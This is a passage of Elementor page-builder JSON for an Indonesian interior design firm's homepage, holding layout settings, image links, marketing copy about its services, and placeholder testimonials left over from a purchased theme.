vg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 